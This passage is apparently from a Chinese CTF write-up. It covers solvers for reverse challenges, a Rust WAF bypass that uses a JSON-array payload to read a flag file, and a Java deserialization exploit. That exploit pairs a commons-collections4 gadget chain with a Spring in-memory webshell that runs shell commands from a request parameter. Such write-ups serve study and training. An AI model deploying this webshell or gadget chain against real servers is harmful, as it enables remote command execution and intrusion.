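        11: lambda a, b: a & b,              # push(pop()&pop())
    }
    code_len = len(code)
    while pc < code_len:
        opcode = fetch8()
        match opcode:
            case 0:
                # push(imm)
                op = fetch8()
                vm_stack.append(op)
            case 1:
                # push(r[n])
                op = fetch8()
                vm_stack.append(vm_regs[op])
            case 2:
                # r[n] = pop()
                op = fetch8()
                vm_regs[op] = vm_stack.pop()
            case 3 | 5 | 7 | 8 | 9 | 11:
                top = vm_stack.pop()
                nxt = vm_stack.pop()
                vm_stack.append(binops[opcode](top, nxt))
            case 10:
                # push(~pop()), truncated to 64 bits
                vm_stack.append(~vm_stack.pop() & mask64)
            case 12:
                # push(read(1)): consume the next input byte
                vm_stack.append(flag[flag_index])
                flag_index += 1
            case 13:
                # write(ch): output is not needed for solving, skip the operand
                fetch8()
            case 14:
                # check(pop() == 0): the first failure reveals part of the
                # expected input, so stop right there
                tmp = vm_stack.pop()
                if tmp != 0:
                    print(f'{pc//8:04X} ')
                    print(bytes.fromhex(f'{tmp:016X}'))
                    print()
                    # raise instead of site's exit() so this also works
                    # when the script is imported or run with -S
                    raise SystemExit(0)
            case _:
                print(opcode)
    print(flag)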
# run the probe input through the VM; the first failing check prints its value
vm_exec()
rocket
跟着官网的反编译文档操作,但是反编译失败
手动测试几组加密数据,发现明文和密文头部存在某些规律,尝试黑盒爆破
import os
import string
import subprocess
from itertools import product

from libnum import s2b, n2s
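def enc(flag):
    """Run ./chall on *flag* and return the ciphertext it writes to ./output.

    The binary reads one line from stdin and leaves the ciphertext as a
    decimal integer in a file named ``output`` in the working directory; that
    file is removed first so a failed run cannot hand back a stale result.

    Args:
        flag: candidate plaintext; a newline is appended, as ``echo`` used to.

    Returns:
        The ciphertext as bytes, or ``b''`` when no usable output was produced.
    """
    try:
        os.unlink('output')
    except OSError:
        # nothing left over from a previous run
        pass
    # feed the candidate on stdin instead of `echo {flag} | ./chall`: the shell
    # pipeline word-split and glob-expanded the candidate, and `?` — part of the
    # search alphabet — is a glob metacharacter
    subprocess.run(['./chall'], input=flag.encode() + b'\n',
                   stdout=subprocess.DEVNULL)
    try:
        with open('output') as fh:
            n = n2s(int(fh.read()))
    except (OSError, ValueError):
        # missing or non-numeric output: treat as "no ciphertext"
        n = b''
    return n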
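# ciphertext of the real flag as printed by ./chall; the published listing had
# this literal wrapped across lines, which is not valid Python, so the digits
# are given as adjacent string pieces and converted once
enc_flag = n2s(int(
    '721227280401354339100842183245741822354476548976404217113598256921137'
    '7620290274828526744558976950004052088838419495093523281490171119109149692'
    '3437536625214832097586215227372220242219941570926244273430571431794896089'
    '42837157528031299236230089474932932551406181'
))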
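def dfs(knowns):
    """Extend the recovered flag prefix one character at a time, depth-first.

    Relies on the author's black-box observation that the cipher appears to
    be prefix-preserving: for a correct prefix the first ``len(prefix)-1``
    ciphertext bytes match ``enc_flag`` exactly and the next byte agrees in
    its top five bits.  Each candidate costs one run of the binary; matching
    candidates are recursed into, and the alphabet loop is abandoned as soon
    as a candidate already diverges two bytes from the end, since the prefix
    itself must then be wrong.

    Args:
        knowns: the plaintext prefix recovered so far.

    Raises:
        SystemExit: once a candidate reproduces the full ciphertext.
    """
    # ciphertext is about three bytes per plaintext character
    if len(knowns) >= len(enc_flag) // 3:
        return
    alphabet = string.ascii_lowercase + string.digits + '{}_?'
    for ch in alphabet:
        flag = knowns + ch
        print('\r' + flag, end='')
        tmp = enc(flag)
        if tmp == enc_flag:
            print('\ngot it')
            # raise instead of site's exit() so this also works when imported
            raise SystemExit(0)
        last = len(flag) - 1
        if tmp and (tmp[last] & 0xf8) == (enc_flag[last] & 0xf8):
            if tmp[:last] == enc_flag[:last]:
                dfs(flag)
        elif tmp[:last - 1] != enc_flag[:last - 1]:
            break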
# ctf{th1s_is_re4lly_beaut1fly_r1ght?}
# dfs('ctf{th')
# start from an empty prefix (the commented call above resumes from a known one)
dfs('')
web
RustWaf
main.rs
use std::env;
use serde::{Deserialize, Serialize};
use serde_json::Value;
// JSON key the WAF refuses to accept from the client (only checked on objects, see waf)
static BLACK_PROPERTY: &str = "protocol";
/// URL-like record a JSON body is validated against and re-serialised from;
/// `protocol` falls back to `default_protocol` when the body omits it.
#[derive(Debug, Serialize, Deserialize)]
struct File {
    #[serde(default = "default_protocol")]
    pub protocol: String,
    pub href: String,
    pub origin: String,
    pub pathname: String,
    pub hostname: String,
}
/// Serde default for `File::protocol`.
pub fn default_protocol() -> String {
    String::from("http")
}
//protocol is default value,can't be customized
/// Decide which file the Node side may read for a request body.
///
/// Returns the body unchanged when it is not JSON, a re-serialised `File`
/// when it is JSON that deserialises into `File` without a client-supplied
/// `protocol` key, and "./main.rs" in every other case (blocked words,
/// blacklisted key, or a shape that does not fit `File`).
///
/// NOTE(review): the `BLACK_PROPERTY` check only runs when the body is a JSON
/// *object*. Serde also deserialises a derived struct from a JSON *array*
/// (fields taken positionally), and that path is reached below without the
/// blacklist, so a client can still populate `protocol` — this is the parser
/// differential the write-up's payload uses. The substring filter is also
/// case-folded but not decoding-aware, so percent-encoded forms of the
/// blocked words pass. A fix would reject anything `json_body.as_object()`
/// cannot represent before attempting the `File` parse, and normalise the
/// path before filtering it.
pub fn waf(body: &str) -> String {
// crude keyword filter on the raw text
if body.to_lowercase().contains("flag") || body.to_lowercase().contains("proc"){
return String::from("./main.rs");
}
if let Ok(json_body) = serde_json::from_str::<Value>(body) {
// key blacklist: applies to JSON objects only
if let Some(json_body_obj) = json_body.as_object() {
if json_body_obj.keys().any(|key| key == BLACK_PROPERTY) {
return String::from("./main.rs");
}
}
//not contains protocol,check if struct is File
if let Ok(file) = serde_json::from_str::<File>(body) {
return serde_json::to_string(&file).unwrap_or(String::from("./main.rs"));
}
} else{
//body not json
return String::from(body);
}
return String::from("./main.rs");
}
/// CLI entry point: the first argument is the request body, the chosen path is printed.
fn main() {
    let args: Vec<String> = env::args().collect();
    let verdict = waf(args[1].as_str());
    println!("{}", verdict);
}
app.js
// dependencies: web framework, body parsing, filesystem, child processes
const express = require('express');
const bodyParser = require('body-parser');
const fs = require('fs');
const { execFileSync } = require('child_process');

const app = express();
// every request body, whatever its content type, reaches the handlers as text
app.use(bodyParser.text({ type: '*/*' }));
// POST /readfile: the raw body is handed to the Rust WAF as a single argv
// element (no shell involved, so no command injection at this hop) and
// whatever the WAF prints becomes the path that is read back to the client.
//
// NOTE(review): the WAF output is JSON.parse'd whenever it parses, so an
// object — not just a string — can reach fs.readFileSync. Node treats `file:`
// URL objects as paths, and the write-up shows a plain object with the same
// fields being accepted too; combined with the WAF re-serialising arrays
// this is the read primitive. Defensively, the parsed value should be
// required to be a string, resolved, and checked against an allow-listed
// directory before any read.
app.post('/readfile', function (req, res) {
let body = req.body.toString();
let file_to_read = "app.js";
const file = execFileSync('/app/rust-waf', [body], {
encoding: 'utf-8'
}).trim();
// a JSON string from the WAF is parsed; anything else is used verbatim
try {
file_to_read = JSON.parse(file)
} catch (e){
file_to_read = file
}
let data = fs.readFileSync(file_to_read);
res.send(data.toString());
});
// GET /: pointer to the source listing
app.get('/', (req, res) => {
  res.send('see `/src`');
});

// GET /src: serves this file verbatim
app.get('/src', (req, res) => {
  const data = fs.readFileSync('app.js');
  res.send(data.toString());
});

app.listen(3000, () => {
  console.log('start listening on port 3000');
});
一个 fs.readFileSync 的 trick,参考:https://brycec.me/posts/corctf_2022_challenges,然后
利用 rust 的解析差异
payload
[
"file:",
"a",
"a",
"/fl%61g",
""
]
ezjava
cc4 组件,而且反序列的点没有任何限制,直接反序列化打内存马
内存马:
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import
org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMappi
ng;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;
// Class carried as the TemplatesImpl payload of the gadget chain below. It only
// needs to be instantiated: the no-arg constructor registers a new Spring MVC
// handler mapping at runtime, so the endpoint exists in memory but in no
// deployed class or configuration file.
//
// Defender notes: (1) the indicator is a registered RequestMappingInfo whose
// handler class is not part of the deployed artifact — enumerate
// RequestMappingHandlerMapping's mappings and diff them against the build;
// (2) the server-side root cause is an ObjectInputStream with no
// deserialization filter (JEP 290 ObjectInputFilter) plus commons-collections4
// on the classpath; (3) a JVM spawning /bin/sh or cmd.exe from a servlet
// thread is the runtime signal to alert on.
public class poc_1 extends AbstractTranslet {
// Runs when the chain instantiates the translet: registers test() under /shell.
public poc_1() throws IOException, NoSuchMethodException {
WebApplicationContext context = (WebApplicationContext)
RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.
servlet.DispatcherServlet.CONTEXT",0);
RequestMappingHandlerMapping mappingHandlerMapping =
context.getBean(RequestMappingHandlerMapping.class);
Method method = poc_1.class.getMethod("test");
PatternsRequestCondition url = new PatternsRequestCondition("/shell");
RequestMethodsRequestCondition ms = new
RequestMethodsRequestCondition();
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null,
null);
poc_1 injectToController = new poc_1("xxx");
mappingHandlerMapping.registerMapping(info,injectToController,method);
}
// Secondary constructor for the controller instance; intentionally empty.
public poc_1(String tmp){
}
// Handler body: passes the `cmd` request parameter to the platform shell and
// echoes its stdout; any failure is masked as a 404.
public void test() throws Exception {
HttpServletRequest request = ((ServletRequestAttributes)
(RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes)
(RequestContextHolder.currentRequestAttributes())).getResponse();
PrintWriter writer = response.getWriter();
String cmd = request.getParameter("cmd");
try{
String o = "";
ProcessBuilder p;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
p = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
} else {
p = new ProcessBuilder(new String[]{"/bin/sh", "-c", cmd});
}
Scanner c = (new Scanner(p.start().getInputStream())).useDelimiter("\\\\A");
o = c.hasNext() ? c.next() : o;
c.close();
writer.write(o);
writer.flush();
writer.close();
} catch (Exception e) {
response.sendError(404);
}
}
// Required by AbstractTranslet; unused.
public void transform(DOM document, SerializationHandler[] handlers) throws
TransletException {
}
// Required by AbstractTranslet; unused.
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler
handler) throws TransletException {
}
// Local test entry: triggers the registering constructor directly.
public static void main(String[] args) throws Exception {
poc_1 t = new poc_1();
}
}
编译后进行 base64 编码,base64 如下
yv66vgAAADQA7QoAOQCACgCBAIIIAIMLAIQAhQcAhgcAhwsABQCIBwCJCABVBwCKCg
AKAIsHAIwHAI0IAI4KAAwAjwcAkAcAkQoAEACSBwCTCgATAJQIAJUKAAgAlgoABgCXBwC
YCgAYAJkKABgAmgsAmwCcCABjCwCdAJ4IAJ8IAKAKAKEAogoADQCjCACkCgANAKUHAK
YIAKcIAKgKACQAjwgAqQgAqgcAqwoAJACsCgCtAK4KACoArwgAsAoAKgCxCgAqALIKAC
oAswoAKgC0CgC1ALYKALUAtwoAtQC0BwC4CwCbALkKAAgAgAcAugEABjxpbml0PgEAA
ygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUB
AAR0aGlzAQAHTHBvY18xOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93
ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJ
NYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhv
ZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAGbWV0aG9k
AQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAN1cmwBAEhMb3JnL3NwcmluZ2
ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdE
NvbmRpdGlvbjsBAAJtcwEATkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9j
b25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uOwEABGluZm8BAD
9Mb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RN
YXBwaW5nSW5mbzsBABJpbmplY3RUb0NvbnRyb2xsZXIBAApFeGNlcHRpb25zBwC7BwC8
AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQADdG1wAQASTGphdmEvbGFuZy9TdHJpb
mc7AQAQTWV0aG9kUGFyYW1ldGVycwEABHRlc3QBAAFwAQAaTGphdmEvbGFuZy9Qcm
9jZXNzQnVpbGRlcjsBAAFvAQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAFlAQAVTGp
hdmEvbGFuZy9FeGNlcHRpb247AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHA
vSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0c
C9IdHRwU2VydmxldFJlc3BvbnNlOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVy
OwEAA2NtZAEADVN0YWNrTWFwVGFibGUHAIkHAL0HAL4HAL8HAI0HAKYHAKsHALgBA
Al0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2
x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaG
UveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vu
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZ
XI7BwDAAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvR
E9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3
I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYW
xpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS9
4bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS
9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0a
W9uSGFuZGxlcjsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBA
BNbTGphdmEvbGFuZy9TdHJpbmc7AQABdAEAClNvdXJjZUZpbGUBAApwb2NfMS5qYXZh
DAA6ADsHAMEMAMIAwwEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRG
lzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcAxAwAxQDGAQA1b3JnL3NwcmluZ2ZyYW1ld29y
ay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhb
WV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGlu
Z0hhbmRsZXJNYXBwaW5nDADHAMgBAAVwb2NfMQEAD2phdmEvbGFuZy9DbGFzcwwA
yQDKAQBGb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL
1BhdHRlcm5zUmVxdWVzdENvbmRpdGlvbgEAEGphdmEvbGFuZy9TdHJpbmcBAAYvc2hlb
GwMADoAegEATG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpd
Glvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb24BADVvcmcvc3ByaW5nZnJhbWV3
b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ldGhvZAwAOgDLAQA9b3JnL3Nwc
mluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW
5mbwwAOgDMAQADeHh4DAA6AFEMAM0AzgEAQG9yZy9zcHJpbmdmcmFtZXdvcmsvd
2ViL2NvbnRleHQvcmVxdWVzdC9TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMMAM8A0Aw
A0QDSBwC+DADTANQHAL0MANUA1gEAAAEAB29zLm5hbWUHANcMANgA1gwA2QDa
AQADd2luDADbANwBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBAAdjbWQuZXhlAQA
CL2MBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA3QDeBwDfDAD
gAOEMADoA4gEAA1xcQQwA4wDkDADlAOYMAOcA2gwA6AA7BwC/DADpAFEMAOoAO
wEAE2phdmEvbGFuZy9FeGNlcHRpb24MAOsA7AEAQGNvbS9zdW4vb3JnL2FwYWNoZS9
4YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZh
L2lvL0lPRXhjZXB0aW9uAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAJWp
hdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2
h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBADljb20v
c3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRp
b24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENv
bnRleHRIb2xkZXIBABhjdXJyZW50UmVxdWVzdEF0dHJpYnV0ZXMBAD0oKUxvcmcvc3Bya
W5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQA5
b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ
1dGVzAQAMZ2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0kpTGphdmEvbG
FuZy9PYmplY3Q7AQAHZ2V0QmVhbgEAJShMamF2YS9sYW5nL0NsYXNzOylMamF2YS9s
YW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZ
hL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQA7KFtMb3JnL3
NwcmluZ2ZyYW1ld29yay93ZWIvYmluZC9hbm5vdGF0aW9uL1JlcXVlc3RNZXRob2Q7KVYB
AfYoTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9QYXR
0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQv
bXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJp
bmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9QYXJhbXNSZXF1ZXN0Q2
9uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb2
4vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3Nlcn
ZsZXQvbXZjL2NvbmRpdGlvbi9Db25zdW1lc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbm
dmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9Qcm9kdWNlc1JlcXVlc3RDb2
5kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvb
i9SZXF1ZXN0Q29uZGl0aW9uOylWAQAPcmVnaXN0ZXJNYXBwaW5nAQBuKExvcmcvc3By
aW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJb
mZvO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7KVY
BAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0Um
VxdWVzdDsBAAtnZXRSZXNwb25zZQEAKigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2
VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7A
QAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N
0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZ
QEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9D
aGFyU2VxdWVuY2U7KVoBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEW
phdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucH
V0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgE
AJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQ
BAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAJc2VuZEVycm9yA
QAEKEkpVgAhAAgAOQAAAAAABgABADoAOwACADwAAAEFAAkACAAAAHEqtwABuAA
CEgMDuQAEAwDAAAVMKxIGuQAHAgDAAAZNEggSCQO9AAq2AAtOuwAMWQS9AA1Z
AxIOU7cADzoEuwAQWQO9ABG3ABI6BbsAE1kZBBkFAQEBAQG3ABQ6BrsACFkSFbcAFjo
HLBkGGQcttgAXsQAAAAIAPQAAACoACgAAABYABAAYABMAGQAfABoAKwAbAD0AHAB
KAB0AXAAeAGcAHwBwACAAPgAAAFIACAAAAHEAPwBAAAAAEwBeAEEAQgABAB8AUg
BDAEQAAgArAEYARQBGAAMAPQA0AEcASAAEAEoAJwBJAEoABQBcABUASwBMAAYAZw
AKAE0AQAAHAE4AAAAGAAIATwBQAAEAOgBRAAIAPAAAAD0AAQACAAAABSq3AAGxA
AAAAgA9AAAACgACAAAAIgAEACQAPgAAABYAAgAAAAUAPwBAAAAAAAAFAFIAUwAB
AFQAAAAFAQBSAAAAAQBVADsAAgA8AAAB4QAGAAgAAADGuAACwAAYwAAYtgAZTL
gAAsAAGMAAGLYAGk0suQAbAQBOKxIcuQAdAgA6BBIeOgUSH7gAILYAIRIitgAjmQAiuw
AkWQa9AA1ZAxIlU1kEEiZTWQUZBFO3ACc6BqcAH7sAJFkGvQANWQMSKFNZBBIpU1kFG
QRTtwAnOga7ACpZGQa2ACu2ACy3AC0SLrYALzoHGQe2ADCZAAsZB7YAMacABRkFOgU
ZB7YAMi0ZBbYAMy22ADQttgA1pwAOOgUsEQGUuQA3AgCxAAEAKwC3ALoANgADAD0
AAABKABIAAAAnAA0AKAAaACkAIQAqACsALAAvAC4APwAvAF4AMQB6ADMAkAA0AKQ
ANQCpADYArwA3ALMAOAC3ADsAugA5ALwAOgDFADwAPgAAAGYACgBbAAMAVgBXA
AYALwCIAFgAUwAFAHoAPQBWAFcABgCQACcAWQBaAAcAvAAJAFsAXAAFAAAAxgA/AE
AAAAANALkAXQBeAAEAGgCsAF8AYAACACEApQBhAGIAAwArAJsAYwBTAAQAZAAAAE
UABv8AXgAGBwBlBwBmBwBnBwBoBwBpBwBpAAD8ABsHAGr8ACUHAGtBBwBp/wAXAA
UHAGUHAGYHAGcHAGgHAGkAAQcAbAoATgAAAAQAAQA2AAEAbQBuAAMAPAAAAD8
AAAADAAAAAbEAAAACAD0AAAAGAAEAAABAAD4AAAAgAAMAAAABAD8AQAAAAAA
AAQBvAHAAAQAAAAEAcQByAAIATgAAAAQAAQBzAFQAAAAJAgBvAAAAcQAAAAEAbQ
B0AAMAPAAAAEkAAAAEAAAAAbEAAAACAD0AAAAGAAEAAABEAD4AAAAqAAQAAAAB
AD8AQAAAAAAAAQBvAHAAAQAAAAEAdQB2AAIAAAABAHcAeAADAE4AAAAEAAEAcw
BUAAAADQMAbwAAAHUAAAB3AAAACQB5AHoAAwA8AAAAQQACAAIAAAAJuwAIWbc
AOEyxAAAAAgA9AAAACgACAAAARwAIAEgAPgAAABYAAgAAAAkAewB8AAAACAABAH
0AQAABAE4AAAAEAAEANgBUAAAABQEAewAAAAEAfgAAAAIAfw==
然后构造 cc4 的链子
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javassist.ClassPool;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;
// Builds and prints (base64) a serialized PriorityQueue whose comparator runs a
// transformer chain during readObject — the commons-collections4 ("CC4") chain
// the write-up sends to the unrestricted deserialization endpoint.
//
// Defender notes: every hop is a plain JDK / commons-collections4 class, so the
// robust mitigation is to never call readObject on untrusted bytes without an
// ObjectInputFilter (JEP 290) that denies TemplatesImpl, TransformingComparator
// and the functors package — or to avoid Java serialization entirely.
public class CC4 {
// Assembles the queue: TemplatesImpl carries the class bytes, the comparator's
// transformer chain is what readObject ends up invoking.
public static void main(String[] args) throws Exception{
//byte[] code = ClassPool.getDefault().get("shell").toBytecode();
byte[] code = Base64.getDecoder().decode("yv66vgAAADQA7QoAOQCACg...");
// base64 of the in-memory webshell class
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates, "_bytecodes", new byte[][]{code});
setFieldValue(templates, "_name", "aaa");
setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new
Class[]{Templates.class}, new Object[]{templates});
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
//instantiateTransformer
new InstantiateTransformer(new Class[]{Templates.class}, new
Object[]{templates})
};
ChainedTransformer chainedTransformer = new
ChainedTransformer(transformers);
TransformingComparator comparator = new
TransformingComparator(chainedTransformer);
// PriorityQueue instance
PriorityQueue priorityQueue = new PriorityQueue(2);
// add ordinary values first; they are swapped out below via setFieldValue
priorityQueue.add(1);
priorityQueue.add(1);
// set the private fields by reflection
Object[] objects = new Object[]{templates,1};
setFieldValue(priorityQueue, "queue", objects);
setFieldValue(priorityQueue, "comparator", comparator);
serialize(priorityQueue);
//unserialize("ser.bin");
}
// Reflection helper: writes a declared field regardless of its access modifier.
public static void setFieldValue(Object object, String fieldName, Object value) throws
Exception{
Field field = object.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(object, value);
}
// Serializes obj and prints it base64-encoded on stdout.
public static void serialize(Object obj) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(obj);
oos.close();
System.out.println(new
String(Base64.getEncoder().encode(baos.toByteArray())));
}
// Reads an object back from a file with a bare ObjectInputStream — no filter,
// the same pattern the challenge server has; both streams are left unclosed.
public static Object unserialize(String Filname) throws Exception,
ClassNotFoundException {
FileInputStream fis = new FileInputStream(Filname);
ObjectInputStream ois = new ObjectInputStream(fis);
Object obj = ois.readObject();
return obj;
}
}